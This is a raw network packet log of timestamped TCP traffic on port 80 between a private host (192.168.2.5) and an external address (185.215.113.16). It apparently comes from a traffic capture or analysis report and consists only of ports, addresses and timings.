Dec 26, 2024 13:01:56.532649040 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.532704115 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.533749104 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.533833981 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.533902884 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.534519911 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.535053968 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.535109997 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.535504103 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.535639048 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.535717010 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.536597013 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.536796093 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.536843061 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.537601948 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.537795067 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.537842035 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.538703918 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.538896084 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.538997889 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.539856911 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.540112972 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.540807962 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.540868044 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.541156054 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.541846991 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.541927099 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.542013884 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.542543888 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.542917013 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.543093920 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.543139935 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.543977022 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.544354916 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.544398069 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.545130014 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.545274019 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.545382023 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.546102047 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.546564102 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.546638966 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.547159910 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.547714949 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.547766924 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.548211098 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.548391104 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.548439980 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.549299955 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.549606085 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.549665928 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.550353050 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.550808907 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.550961971 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.551029921 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.551412106 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.551628113 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.551732063 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.552490950 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.552897930 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.553026915 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.553544998 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.553982973 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.554064035 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.554604053 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.555397987 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.555476904 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.555656910 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.556327105 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.556385994 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.556710958 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.556890011 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.556960106 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.557785034 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.558192015 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.558334112 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.558861971 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.559103012 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.559149981 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.559897900 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.560194969 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.560249090 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.560992956 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.561084986 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.561136961 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.561582088 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.562032938 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.562208891 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.562304020 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.563080072 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.563990116 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.564054012 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.564145088 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.564697981 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.564770937 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.565160990 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.579977036 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.589848042 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.720047951 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.720146894 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.720292091 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.720448017 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.720685005 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.720741987 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.721214056 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.721738100 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.721925974 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.722007990 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.722824097 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.722934961 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.723007917 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.723855019 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.723974943 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.724682093 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.724914074 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.725045919 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.725393057 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.725971937 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.726144075 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.726183891 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.727010965 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.727150917 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.727519989 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.728183985 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.728257895 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.728415966 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.729160070 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.729211092 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.729371071 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.730228901 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.730384111 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.730434895 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.731355906 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.731441975 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.731484890 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.732394934 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.732446909 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.732590914 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.733535051 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.733655930 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.733696938 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.734477997 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.734992981 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.735044003 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.735523939 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.735614061 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.735917091 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.736567020 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.736618042 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.736618996 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.737663031 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.737708092 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.737884998 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.738765955 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.738778114 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.738811016 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.739856958 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.740032911 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.740242958 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.740845919 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.740920067 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.740983009 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.741933107 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.741975069 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.742480993 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.742935896 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.742980957 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.743491888 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.744035959 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.744421005 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.744493008 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.745102882 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.745280027 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.745341063 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.746150970 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.746191025 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.746223927 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.747216940 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.747322083 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.747786045 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.748250961 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.748298883 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.748404026 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.749345064 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.749495983 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.749517918 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.750395060 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.750442028 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.750526905 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.751429081 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.751512051 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.751563072 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.752537966 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.752585888 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.752985954 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.753645897 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.753729105 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.753814936 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.754638910 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.754810095 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.754897118 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.755795002 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.755836964 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.755907059 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.756910086 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.756953955 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.757030010 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.757817984 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.757884026 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.758243084 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.758869886 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.758980989 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.759325981 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.759923935 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.759963036 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.760158062 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.761023998 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.761073112 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.761130095 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.762062073 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.762172937 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.762227058 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.763128996 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.763178110 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.763453007 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.764194012 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.764266968 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.764713049 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.765255928 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.765302896 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.765502930 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.766311884 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.766387939 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.766586065 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.766789913 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.767369032 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.767482042 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.767554045 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.768491983 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.768728018 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.768781900 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.769531965 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.769674063 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.769694090 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.770580053 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.770678043 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.771393061 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.771622896 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.771708965 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.772022009 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.772701979 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.772845984 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.773144007 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.773751974 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.773811102 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.774199009 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.774961948 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.775109053 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.775135994 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.790906906 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.930697918 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.930826902 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.930871964 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.931238890 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.931341887 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.931396961 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.931967020 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.932146072 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.932193041 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.933089972 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.933373928 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.933442116 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.934117079 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.934288979 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.934384108 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.935199976 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.935348988 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.935511112 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.936255932 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.936444998 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.936525106 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.937287092 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.938034058 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.938085079 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.938364983 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.938378096 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.938414097 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.939399004 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.939646959 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.939698935 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.940454006 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.940598011 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.940705061 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.941515923 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.941842079 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.941952944 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.942564011 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.942799091 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.942857981 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.943641901 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.944567919 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.945107937 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.945194006 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.946046114 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.946114063 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.946326017 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.946398973 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.946464062 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.946909904 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.946980953 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.947026968 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.947896957 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.948071003 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.948122025 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.949007034 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.949105978 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.949213028 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.950040102 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.950258970 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.950311899 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.951116085 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.951384068 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.951455116 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.952153921 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.952285051 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.952438116 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.953238010 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.953418016 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.953474045 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.954274893 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.954528093 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.954570055 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.955310106 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.955426931 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.955477953 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.956423998 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.956588984 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.956819057 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.957472086 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.957874060 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.957947969 CET	49743	80	192.168.2.5	185.215.113.16
